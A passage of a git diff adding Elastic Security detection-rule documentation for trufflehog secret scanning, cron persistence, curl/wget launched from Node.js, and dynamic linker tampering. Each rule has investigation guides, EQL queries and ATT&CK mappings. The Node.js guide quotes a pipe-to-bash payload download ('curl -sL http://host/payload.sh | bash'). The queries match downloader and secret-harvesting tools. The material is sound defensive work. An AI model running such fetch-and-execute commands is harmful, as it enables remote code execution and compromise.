commands like curl/wget/netcat. +- Restore the workstation or runner from a known-good image if tampering is suspected, re-enroll endpoint protection, reissue required developer or CI credentials with least privilege, and validate normal pulls to internal git and cloud services. +- Escalate to full incident response if trufflehog ran under a service account, on a build server/CI runner, or if any discovered secret was used to authenticate to external git remotes (e.g., github.com), cloud APIs, or private registries in the same session. +- Harden by blocking unapproved trufflehog execution via application control, moving approved secret scanning to a locked-down pipeline, enforcing short-lived PATs and key rotation, enabling egress filtering from developer hosts/runners, and deploying fleet-wide detections for "trufflehog --results=verified --json filesystem". + + +==== Rule query + + +[source, js] +---------------------------------- +process where event.type == "start" and process.name : ("trufflehog.exe", "trufflehog") and +process.args == "--results=verified" and process.args == "--json" and process.args == "filesystem" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Technique: +** Name: Credentials from Password Stores +** ID: T1555 +** Reference URL: https://attack.mitre.org/techniques/T1555/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-cron-job-created-or-modified.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-cron-job-created-or-modified.asciidoc new file mode 100644 index 0000000000..6a8cb8c081 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-cron-job-created-or-modified.asciidoc @@ -0,0 +1,249 @@ +[[prebuilt-rule-8-19-8-cron-job-created-or-modified]] +=== Cron Job Created or Modified + +This rule monitors for (ana)cron jobs being created or renamed. Linux cron jobs are scheduled tasks that can be leveraged by system administrators to set up scheduled tasks, but may be abused by malicious actors for persistence, privilege escalation and command execution. By creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.file* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/ +* https://www.elastic.co/security-labs/primer-on-persistence-mechanisms + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Privilege Escalation +* Tactic: Execution +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 18 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Cron Job Created or Modified* + +Linux cron jobs are scheduled tasks that run at specified intervals or times, managed by the cron daemon. + +By creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities. + +This rule monitors the creation of cron jobs by monitoring for file creation and rename events in the most common cron job task location directories. + +> **Note**: +> This investigation guide uses the https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. +> This investigation guide uses https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html[placeholder fields] to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run. + + +*Possible Investigation Steps* + + +- Investigate the cron job file that was created or modified. +- Investigate whether any other files in any of the available cron job directories have been altered through OSQuery. + - !{osquery{"label":"Osquery - Retrieve File Listing Information","query":"SELECT * FROM file WHERE (path LIKE '/etc/cron.allow.d/%' OR path LIKE '/etc/cron.d/%' OR path LIKE '/etc/cron.hourly/%'\nOR path LIKE '/etc/cron.daily/%' OR path LIKE '/etc/cron.weekly/%' OR path LIKE '/etc/cron.monthly/%' OR path LIKE\n'/var/spool/cron/crontabs/%')\n"}} + - !{osquery{"label":"Osquery - Retrieve Cron File Information","query":"SELECT * FROM file WHERE (path = '/etc/cron.allow' OR path = '/etc/cron.deny' OR path = '/etc/crontab')\n"}} + - !{osquery{"label":"Osquery - Retrieve Additional File Listing Information","query":"SELECT f.path, u.username AS file_owner, g.groupname AS group_owner, datetime(f.atime, 'unixepoch') AS\nfile_last_access_time, datetime(f.mtime, 'unixepoch') AS file_last_modified_time, datetime(f.ctime, 'unixepoch') AS\nfile_last_status_change_time, datetime(f.btime, 'unixepoch') AS file_created_time, f.size AS size_bytes FROM file f LEFT\nJOIN users u ON f.uid = u.uid LEFT JOIN groups g ON f.gid = g.gid WHERE ( path LIKE '/etc/cron.allow.d/%' OR path LIKE\n'/etc/cron.d/%' OR path LIKE '/etc/cron.hourly/%' OR path LIKE '/etc/cron.daily/%' OR path LIKE '/etc/cron.weekly/%' OR\npath LIKE '/etc/cron.monthly/%' OR path LIKE '/var/spool/cron/crontabs/%')\n"}} +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations. + - !{osquery{"label":"Osquery - Retrieve Running Processes by User","query":"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username"}} +- Investigate other alerts associated with the user/host during the past 48 hours. +- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations. +- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. + - If scripts or executables were dropped, retrieve the files and determine if they are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - Check if the domain is newly registered or unexpected. + - Check the reputation of the domain or IP address. + - File access, modification, and creation activities. +- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes. + - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration. + - !{osquery{"label":"Osquery - Retrieve Listening Ports","query":"SELECT pid, address, port, socket, protocol, path FROM listening_ports"}} + - !{osquery{"label":"Osquery - Retrieve Open Sockets","query":"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets"}} + - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action. + - !{osquery{"label":"Osquery - Retrieve Information for a Specific User","query":"SELECT * FROM users WHERE username = {{user.name}}"}} +- Investigate whether the user is currently logged in and active. + - !{osquery{"label":"Osquery - Investigate the Account Authentication Status","query":"SELECT * FROM logged_in_users WHERE user = {{user.name}}"}} + + +*False Positive Analysis* + + +- If this activity is related to new benign software installation activity, consider adding exceptions — preferably with a combination of user and command line conditions. +- If this activity is related to a system administrator who uses cron jobs for administrative purposes, consider adding exceptions for this specific administrator user account. +- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need. + + +*Related Rules* + + +- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042 +- Potential Persistence Through Run Control Detected - 0f4d35e4-925e-4959-ab24-911be207ee6f +- Potential Persistence Through init.d Detected - 474fd20e-14cc-49c5-8160-d9ab4ba16c8b +- Systemd Timer Created - 7fb500fa-8e24-4bd1-9480-2a819352602c +- Systemd Service Created - 17b0a495-4d9f-414c-8ad0-92f018b8e001 + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Delete the service/timer or restore its original configuration. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and +event.action in ("rename", "creation") and file.path : ( + "/etc/cron.allow", "/etc/cron.deny", "/etc/cron.d/*", "/etc/cron.hourly/*", "/etc/cron.daily/*", "/etc/cron.weekly/*", + "/etc/cron.monthly/*", "/etc/crontab", "/var/spool/cron/crontabs/*", "/var/spool/anacron/*" +) and not ( + process.executable in ( + "/bin/dpkg", "/usr/bin/dpkg", "/bin/dockerd", "/usr/bin/dockerd", "/usr/sbin/dockerd", "/bin/microdnf", + "/usr/bin/microdnf", "/bin/rpm", "/usr/bin/rpm", "/bin/snapd", "/usr/bin/snapd", "/bin/yum", "/usr/bin/yum", + "/bin/dnf", "/usr/bin/dnf", "/bin/podman", "/usr/bin/podman", "/bin/dnf-automatic", "/usr/bin/dnf-automatic", + "/bin/pacman", "/usr/bin/pacman", "/usr/bin/dpkg-divert", "/bin/dpkg-divert", "/sbin/apk", "/usr/sbin/apk", + "/usr/local/sbin/apk", "/usr/bin/apt", "/usr/sbin/pacman", "/bin/podman", "/usr/bin/podman", "/usr/bin/puppet", + "/bin/puppet", "/opt/puppetlabs/puppet/bin/puppet", "/usr/bin/chef-client", "/bin/chef-client", + "/bin/autossl_check", "/usr/bin/autossl_check", "/proc/self/exe", "/dev/fd/*", "/usr/bin/pamac-daemon", + "/bin/pamac-daemon", "/usr/local/bin/dockerd", "/opt/elasticbeanstalk/bin/platform-engine", + "/opt/puppetlabs/puppet/bin/ruby", "/usr/libexec/platform-python", "/opt/imunify360/venv/bin/python3", + "/opt/eset/efs/lib/utild", "/usr/sbin/anacron", "/usr/bin/podman", "/kaniko/kaniko-executor", + "/usr/bin/pvedaemon", "./usr/bin/podman", "/usr/lib/systemd/systemd" + ) or + file.path like ("/var/spool/cron/crontabs/tmp.*", "/etc/cron.d/jumpcloud-updater") or + file.extension in ("swp", "swpx", "swx", "dpkg-remove") or + file.Ext.original.extension == "dpkg-new" or + process.executable : ( + "/nix/store/*", "/var/lib/dpkg/*", "/tmp/vmis.*", "/snap/*", "/dev/fd/*", "/usr/libexec/platform-python*", + "/var/lib/waagent/Microsoft*" + ) or + process.executable == null or + process.name in ( + "crond", "executor", "puppet", "droplet-agent.postinst", "cf-agent", "schedd", "imunify-notifier", "perl", + "jumpcloud-agent", "crio", "dnf_install", "utild" + ) or + (process.name == "sed" and file.name : "sed*") or + (process.name == "perl" and file.name : "e2scrub_all.tmp*") or + (process.name in ("vi", "vim") and file.name like "*~") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Cron +** ID: T1053.003 +** Reference URL: https://attack.mitre.org/techniques/T1053/003/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Cron +** ID: T1053.003 +** Reference URL: https://attack.mitre.org/techniques/T1053/003/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Cron +** ID: T1053.003 +** Reference URL: https://attack.mitre.org/techniques/T1053/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-curl-or-wget-spawned-via-node-js.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-curl-or-wget-spawned-via-node-js.asciidoc new file mode 100644 index 0000000000..281bc7bc1e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-curl-or-wget-spawned-via-node-js.asciidoc @@ -0,0 +1,153 @@ +[[prebuilt-rule-8-19-8-curl-or-wget-spawned-via-node-js]] +=== Curl or Wget Spawned via Node.js + +This rule detects when Node.js, directly or via a shell, spawns the curl or wget command. This may indicate command and control behavior. Adversaries may use Node.js to download additional tools or payloads onto the system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Command and Control +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Curl or Wget Spawned via Node.js* + + +This rule flags Node.js launching curl or wget, directly or via a shell, a common technique to fetch payloads and enable command-and-control. Attackers often abuse child_process in Node apps to run "curl -sL http://host/payload.sh | bash," pulling a second stage from a remote host and executing it immediately under the guise of legitimate application activity. + + +*Possible investigation steps* + + +- Pull the full process tree and command line to extract URLs/domains, flags (e.g., -sL, -O, --insecure), and identify whether the output is piped into an interpreter, indicating immediate execution risk. +- Correlate with file system activity to find newly created or modified artifacts (e.g., in /tmp, /var/tmp, /dev/shm, or the app directory), then hash and scan them and check for follow-on executions. +- Pivot to network telemetry to enumerate connections around the event from both Node.js and the child process, assessing destination reputation (IP/domain, ASN, geo, cert/SNI) against approved update endpoints. +- Trace the initiating Node.js code path and deployment (child_process usage such as exec/spawn/execFile), and review package.json lifecycle scripts and recent npm installs or postinstall hooks for unauthorized download logic. +- Verify user and runtime context (service account/container/pod), inspect environment variables like HTTP(S)_PROXY/NO_PROXY, and check whether credentials or tokens were passed to curl/wget to assess exposure. + + +*False positive analysis* + + +- A legitimate Node.js service executes curl or wget to retrieve configuration files, certificates, or perform health checks against approved endpoints during startup or routine operation. +- Node.js install or maintenance scripts use a shell with -c to run curl or wget and download application assets or updates, triggering the rule even though this aligns with expected deployment workflows. + + +*Response and remediation* + + +- Immediately isolate the affected host or container, stop the Node.js service that invoked curl/wget (and any parent shell), terminate those processes, and block the exact URLs/domains/IPs observed in the command line and active connections. +- Quarantine and remove any artifacts dropped by the downloader (e.g., files in /tmp, /var/tmp, /dev/shm or paths specified by -O), delete added cron/systemd entries referencing those files, and revoke API tokens or credentials exposed in the command line or headers. +- Escalate to full incident response if output was piped to an interpreter (curl ... | bash or wget ... | sh), if --insecure/-k or self-signed endpoints were used, if unknown external infrastructure was contacted, or if secrets were accessed or exfiltrated. +- Rebuild and redeploy the workload from a known-good image, remove the malicious child_process code path from the Node.js application, restore validated configs/data, rotate any keys or tokens used by that service, and verify no further curl/wget spawns occur post-recovery. +- Harden by removing curl/wget from runtime images where not required, enforcing egress allowlists for the service, constraining execution with AppArmor/SELinux/seccomp and least-privilege service accounts, and adding CI/CD checks to block package.json postinstall scripts or code that shells out to downloaders. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.parent.name == "node" and ( + ( + process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and + process.args == "-c" and process.command_line like~ ("*curl*", "*wget*") + ) or + ( + process.name in ("curl", "wget") + ) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Sub-technique: +** Name: Web Protocols +** ID: T1071.001 +** Reference URL: https://attack.mitre.org/techniques/T1071/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-dynamic-linker-creation-or-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-dynamic-linker-creation-or-modification.asciidoc new file mode 100644 index 0000000000..d937739b3a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-dynamic-linker-creation-or-modification.asciidoc @@ -0,0 +1,193 @@ +[[prebuilt-rule-8-19-8-dynamic-linker-creation-or-modification]] +=== Dynamic Linker Creation or Modification + +Detects the creation or modification of files related to the configuration of the dynamic linker on Linux systems. The dynamic linker is a shared library that is used by the Linux kernel to load and execute programs. Attackers may attempt to hijack the execution flow of a program by modifying the dynamic linker configuration files. This technique is often observed by userland rootkits that leverage shared objects to maintain persistence on a compromised host. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.file* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Persistence +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 7 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Dynamic Linker Creation or Modification* + + +The dynamic linker in Linux systems is crucial for loading shared libraries needed by programs at runtime. Adversaries may exploit this by altering linker configuration files to hijack program execution, enabling persistence or evasion. The detection rule identifies suspicious creation or renaming of these files, excluding benign processes and extensions, to flag potential threats. + + +*Possible investigation steps* + + +- Review the file path involved in the alert to determine if it matches any of the critical dynamic linker configuration files such as /etc/ld.so.preload, /etc/ld.so.conf.d/*, or /etc/ld.so.conf. +- Identify the process that triggered the alert by examining the process.executable field and verify if it is listed as a benign process in the exclusion list. If not, investigate the legitimacy of the process. +- Check the file extension and file.Ext.original.extension fields to ensure the file is not a temporary or expected system file, such as those with extensions like swp, swpx, swx, or dpkg-new. +- Investigate the process.name field to determine if the process is a known system utility like java, sed, or perl, and assess if its usage in this context is typical or suspicious. +- Gather additional context by reviewing recent system logs and other security alerts to identify any related or preceding suspicious activities that might indicate a broader attack or compromise. + + +*False positive analysis* + + +- Package management operations can trigger false positives when legitimate package managers like dpkg, rpm, or yum modify linker configuration files. To handle this, ensure these processes are included in the exclusion list to prevent unnecessary alerts. +- System updates or software installations often involve temporary file modifications with extensions like swp or dpkg-new. Exclude these extensions to reduce false positives. +- Automated system management tools such as Puppet or Chef may modify linker files as part of their configuration management tasks. Add these tools to the exclusion list to avoid false alerts. +- Virtualization and containerization platforms like Docker or VMware may alter linker configurations during normal operations. Verify these processes and exclude them if they are part of routine system behavior. +- Custom scripts or applications that use common names like sed or perl might be flagged if they interact with linker files. Review these scripts and consider excluding them if they are verified as safe. + + +*Response and remediation* + + +- Immediately isolate the affected system from the network to prevent further unauthorized access or lateral movement by the adversary. +- Review and restore the original dynamic linker configuration files from a known good backup to ensure the integrity of the system's execution flow. +- Conduct a thorough scan of the affected system using updated antivirus and anti-malware tools to identify and remove any additional malicious software or scripts. +- Analyze system logs and the process execution history to identify the source of the unauthorized changes and determine if any other systems may be compromised. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to assess the potential impact on the organization. +- Implement additional monitoring on the affected system and similar systems to detect any future attempts to modify dynamic linker configuration files. +- Review and update access controls and permissions to ensure that only authorized personnel have the ability to modify critical system files, reducing the risk of similar incidents in the future. + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and event.action in ("creation", "rename") and +file.path : ("/etc/ld.so.preload", "/etc/ld.so.conf.d/*", "/etc/ld.so.conf") and +not ( + process.executable in ( + "/bin/dpkg", "/usr/bin/dpkg", "/bin/dockerd", "/usr/bin/dockerd", "/usr/sbin/dockerd", "/bin/microdnf", + "/usr/bin/microdnf", "/bin/rpm", "/usr/bin/rpm", "/bin/snapd", "/usr/bin/snapd", "/bin/yum", "/usr/bin/yum", + "/bin/dnf", "/usr/bin/dnf", "/bin/podman", "/usr/bin/podman", "/bin/dnf-automatic", "/usr/bin/dnf-automatic", + "/bin/pacman", "/usr/bin/pacman", "/usr/bin/dpkg-divert", "/bin/dpkg-divert", "/sbin/apk", "/usr/sbin/apk", + "/usr/local/sbin/apk", "/usr/bin/apt", "/usr/sbin/pacman", "/bin/podman", "/usr/bin/podman", "/usr/bin/puppet", + "/bin/puppet", "/opt/puppetlabs/puppet/bin/puppet", "/usr/bin/chef-client", "/bin/chef-client", + "/bin/autossl_check", "/usr/bin/autossl_check", "/proc/self/exe", "/usr/bin/pamac-daemon", + "/bin/pamac-daemon", "/usr/lib/snapd/snapd", "/usr/local/bin/dockerd", "/usr/libexec/platform-python", + "/usr/lib/snapd/snap-update-ns", "/usr/bin/vmware-config-tools.pl", "./usr/bin/podman", "/bin/nvidia-cdi-hook", + "/usr/lib/dracut/dracut-install", "./usr/bin/nvidia-cdi-hook", "/.envbuilder/bin/envbuilder", "/usr/bin/buildah", + "/usr/sbin/dnf", "/usr/bin/pamac", "/sbin/pacman", "/usr/bin/crio", "/usr/sbin/yum-cron" + ) or + file.extension in ("swp", "swpx", "swx", "dpkg-remove") or + file.Ext.original.extension == "dpkg-new" or + process.executable : ( + "/nix/store/*", "/var/lib/dpkg/*", "/snap/*", "/dev/fd/*", "/usr/lib/virtualbox/*", "/opt/dynatrace/oneagent/*", + "/usr/libexec/platform-python*" + ) or + process.executable == null or + process.name in ( + "java", "executor", "ssm-agent-worker", "packagekitd", "crio", "dockerd-entrypoint.sh", + "docker-init", "BootTimeChecker", "dockerd (deleted)", "dockerd" + ) or + (process.name == "sed" and file.name : "sed*") or + (process.name == "perl" and file.name : "e2scrub_all.tmp*") or + (process.name == "init" and file.name == "ld.wsl.conf") or + (process.name == "sshd" and file.extension == "dpkg-new") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: Dynamic Linker Hijacking +** ID: T1574.006 +** Reference URL: https://attack.mitre.org/techniques/T1574/006/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: Dynamic Linker Hijacking +** ID: T1574.006 +** Reference URL: https://attack.mitre.org/techniques/T1574/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-dynamic-linker-ld-so-creation.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-dynamic-linker-ld-so-creation.asciidoc new file mode 100644 index 0000000000..0f6defebff --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-dynamic-linker-ld-so-creation.asciidoc @@ -0,0 +1,190 @@ +[[prebuilt-rule-8-19-8-dynamic-linker-ld-so-creation]] +=== Dynamic Linker (ld.so) Creation + +This rule detects the creation of the dynamic linker (ld.so). The dynamic linker is used to load shared libraries needed by an executable. Attackers may attempt to replace the dynamic linker with a malicious version to execute arbitrary code. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.file* +* logs-sentinel_one_cloud_funnel.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Tactic: Persistence +* Data Source: Elastic Defend +* Data Source: SentinelOne +* Data Source: Elastic Endgame +* Resources: Investigation Guide + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Dynamic Linker (ld.so) Creation* + + +The dynamic linker, ld.so, is crucial in Linux environments for loading shared libraries required by executables. Adversaries may exploit this by replacing it with a malicious version to execute unauthorized code, achieving persistence or evading defenses. The detection rule identifies suspicious creation of ld.so files, excluding benign processes, to flag potential threats. + + +*Possible investigation steps* + + +- Review the process that triggered the alert by examining the process.executable field to understand which application attempted to create the ld.so file. +- Check the 